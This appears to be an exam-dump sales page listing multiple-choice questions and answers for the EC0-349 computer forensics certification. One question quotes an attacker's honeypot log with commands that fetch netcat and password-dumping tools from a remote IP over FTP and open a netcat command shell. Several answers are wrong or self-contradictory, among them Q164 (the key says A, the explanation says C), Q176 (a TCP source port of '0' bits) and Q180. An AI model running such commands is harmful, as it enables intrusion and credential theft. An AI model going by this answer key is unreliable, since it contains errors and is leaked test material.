Instant Download EC0-349 Dumps Q&As Provide PDF&Test Engine
Fast Exam Updates EC0-349 dumps with PDF Test Engine Practice
NEW QUESTION # 164
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.
The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
- A. The attack is a remote exploit and the hacker downloads three files
- B. It is a local exploit where the attacker logs in using username johna2k
- C. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
- D. There are two attackers on the system - johna2k and haxedj00
Answer: A
Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
NEW QUESTION # 165
Ever-changing advancement or mobile devices increases the complexity of mobile device examinations. Which or the following is an appropriate action for the mobile forensic investigation?
- A. Do not wear gloves while handling cell phone evidence to maintain integrity of physical evidence
- B. If the device's display is ON. the screen's contents should be photographed and, if necessary, recorded manually, capturing the time, service status, battery level, and other displayed icons
- C. If the phone is in a cradle or connected to a PC with a cable, then unplug the device from the computer
- D. To avoid unwanted interaction with devices found on the scene, turn on any wireless interfaces such as Bluetooth and Wi-Fi radios
Answer: B
NEW QUESTION # 166
You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD. One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers. What type of firewall must you implement to abide by this policy?
- A. Packet filtering firewall
- B. Circuit-level proxy firewall
- C. Application-level proxy firewall
- D. Stateful firewall
Answer: D
NEW QUESTION # 167
Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?
- A. OSPF
- B. ATM
- C. UDP
- D. BPG
Answer: A
NEW QUESTION # 168
Data is striped at a byte level across multiple drives and parity information is distributed among all member drives.
What RAID level is represented here?
- A. RAID Level 5
- B. RAID Level0
- C. RAID Level 3
- D. RAID Level 1
Answer: A
NEW QUESTION # 169
Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish?
dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror, sync
- A. Low-level format
- B. Fill the disk with zeros
- C. Fill the disk with 4096 zeros
- D. Copy files from the master disk to the slave disk on the secondary IDE controller
Answer: B
NEW QUESTION # 170
Cyber-crime is defined as any Illegal act involving a gun, ammunition, or its applications.
- A. False
- B. True
Answer: A
NEW QUESTION # 171
Why is it Important to consider health and safety factors in the work carried out at all stages of the forensic process conducted by the forensic analysts?
- A. Local law enforcement agencies compel them to wear latest gloves
- B. This is to protect the staff and preserve any fingerprints that may need to be recovered at a later date
- C. All forensic teams should wear protective latex gloves which makes them look professional and cool
- D. It is a part of ANSI 346 forensics standard
Answer: B
NEW QUESTION # 172
Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security.
The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?
- A. Block access to UDP port 171
- B. Block access to TCP port 171
- C. Change the default community string names
- D. Block all internal MAC address from using SNMP
Answer: C
NEW QUESTION # 173
After attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one of the servers. Why is that?
- A. RestrictAnonymous must be set to "3" for complete security
- B. RestrictAnonymous must be set to "10" for complete security
- C. There is no way to always prevent an anonymous null session from establishing
- D. RestrictAnonymous must be set to "2" for complete security
Answer: D
NEW QUESTION # 174
You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the firm's employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will. What do you do?
- A. Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned
- B. Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment
- C. Inform the owner that conducting an investigation without a policy is a violation of the employee's expectation of privacy
- D. Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies
Answer: C
Explanation:
Explanation
NEW QUESTION # 175
You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?
- A. Throw the hard disk into the fire
- B. Format the hard disk multiple times using a low level disk utility
- C. Overwrite the contents of the hard disk with Junk data
- D. Run the powerful magnets over the hard disk
Answer: A
NEW QUESTION # 176
How many bits is Source Port Number in TCP Header packet?
- A. 0
- B. 1
- C. 2
Answer: A
NEW QUESTION # 177
Which of the following statement is not correct when dealing with a powered-on computer at the crime scene?
- A. If a monitor is powered on and the display is blank, move the mouse slowly without depressing any mouse button and take a photograph
- B. If a computer is on and the monitor shows some picture or screen saver, move the mouse slowly without depressing any mouse button and take a photograph of the screen and record the information displayed
- C. If the computer is switched off. power on the computer to take screenshot of the desktop
- D. If a computer is switched on and the screen is viewable, record the programs running on screen and photograph the screen
Answer: C
NEW QUESTION # 178
Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?
- A. wire tap
- B. bench warrant
- C. search warrant
- D. subpoena
Answer: C
NEW QUESTION # 179
Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual media. He shuts the system down by pulling the power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the next sequence of events?
- A. Connect the target media; prepare the system for acquisition; Secure the evidence; Copy the media
- B. Prepare the system for acquisition; Connect the target media; copy the media; Secure the evidence
- C. Secure the evidence; prepare the system for acquisition; Connect the target media; copy the media
- D. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media
Answer: B
NEW QUESTION # 180
When examining the log files from a Windows IIS Web Server, how often is a new log file created?
- A. a new log is created each time the Web Server is started
- B. the same log is used at all times
- C. a new log file is created everyday
- D. a new log file is created each week
Answer: B
NEW QUESTION # 181
Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test.
The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?
- A. True positives
- B. False positives
- C. False negatives
- D. True negatives
Answer: C
NEW QUESTION # 182
What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server the course of its lifetime?
- A. review of SIDs in the Registry
- B. analysis of volatile data
- C. comparison of MD5 checksums
- D. forensic duplication of hard drive
Answer: A
Explanation:
Not MD5: MD5 checksums are used as integrity checks User accounts are assigned a unique SID, and the SID are not reused.
NEW QUESTION # 183
A steganographic file system is a method to store the files in a way that encrypts and hides the data without the knowledge of others
- A. False
- B. True
Answer: B
NEW QUESTION # 184
......
Exam Valid Dumps with Instant Download Free Updates: https://www.topexamcollection.com/EC0-349-vce-collection.html
EC0-349 Dumps First Attempt Guaranteed Success: https://drive.google.com/open?id=1Gvh9QQeBD6uiY1FdMjDq2rBhPDjsK1-q

